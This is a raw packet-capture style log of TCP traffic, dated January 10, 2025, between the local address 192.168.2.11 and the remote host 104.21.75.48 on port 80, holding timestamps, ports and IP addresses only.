Jan 10, 2025 19:12:30.605561972 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605581045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605593920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605600119 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605600119 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605606079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605618954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605632067 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605632067 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605664968 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605664968 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605686903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605700016 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605715036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605739117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605743885 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605750084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605762005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605763912 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605776072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605813026 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605813026 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605923891 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605936050 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605952024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605973005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605973959 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605994940 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605998993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606012106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606023073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606029034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606029034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606036901 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606049061 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606054068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606055021 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606079102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606090069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606090069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606100082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606111050 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606122971 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606127977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606148958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606161118 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606162071 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606162071 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606173992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606198072 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606234074 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.606235981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606247902 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.606297016 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613323927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613337994 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613367081 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613378048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613392115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613410950 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613437891 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613485098 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613491058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613502979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613514900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613527060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613544941 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613564968 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613578081 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613579988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613590002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613604069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613626003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613636971 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613650084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613652945 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613652945 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613677025 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613689899 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613706112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613709927 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613725901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613733053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613744020 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613749027 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613770962 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613771915 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613785028 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.613806009 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613806009 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.613817930 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614315033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614327908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614339113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614381075 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614381075 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614435911 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614448071 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614459038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614471912 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614487886 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614502907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614517927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614518881 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614537954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614550114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614573002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614577055 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614577055 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614595890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614595890 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614609003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614629030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614624977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614653111 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614691973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614696980 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614756107 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614767075 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614780903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614792109 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614814997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614842892 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614876986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614888906 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614902020 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614911079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614928007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614932060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614939928 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.614954948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614968061 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614974976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614984989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.614995956 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.615001917 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.615001917 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.615036011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.615036011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.692675114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.692687035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.692745924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.692759037 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.692771912 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.692837954 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.692837954 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.692847967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.692864895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.692878008 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.692908049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.692939997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693022966 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693036079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693048000 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693087101 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693087101 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693099976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693111897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693125963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693137884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693147898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693167925 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693167925 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693342924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693460941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693485975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693495989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693536043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693542004 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693542004 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693548918 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693566084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693586111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693588018 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693588018 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693602085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693603039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693629026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693643093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693648100 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693648100 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693655968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693665981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693708897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693708897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693710089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693737030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693747997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693773031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693773031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693778992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693783998 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693793058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693842888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693842888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693860054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693871021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693881989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693895102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693907976 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693907976 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693928003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693931103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693945885 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693958044 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.693993092 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693993092 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.693998098 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694036007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694041967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694055080 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694067955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694097996 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694145918 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694212914 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694225073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694237947 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694248915 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694263935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694281101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694284916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694284916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694308043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694319963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694331884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694344044 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694345951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694345951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694355965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694391966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694391966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694425106 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694452047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694464922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694475889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694488049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694500923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694509983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694509983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694546938 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694546938 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694551945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694565058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694576979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694587946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694623947 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694629908 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694629908 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694638014 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694667101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694679976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694689989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694701910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694701910 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694730997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694730997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694739103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694777966 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694811106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694818020 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.694823027 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.694868088 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702045918 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702088118 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702110052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702166080 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702213049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702255011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702255011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702270985 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702328920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702341080 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702343941 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702343941 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702353954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702374935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702375889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702403069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702403069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702440977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702481031 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702492952 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702503920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702517033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702529907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702532053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702533007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702553988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702569962 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702615976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702629089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702640057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702651024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702668905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702670097 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702670097 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702697039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702722073 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702788115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702822924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702914953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702925920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.702967882 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.702967882 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703046083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703111887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703125000 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703180075 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703183889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703183889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703195095 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703207016 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703253984 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703603983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703653097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703664064 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703690052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703702927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703711033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703716040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703752995 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703752995 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703795910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703807116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703815937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703819990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703835011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703847885 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703847885 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703871012 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703883886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703896999 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.703922987 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.703962088 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.704003096 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.704015970 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.704030037 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.704045057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.704060078 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.704060078 CET	49726	80	192.168.2.11	104.21.75.48
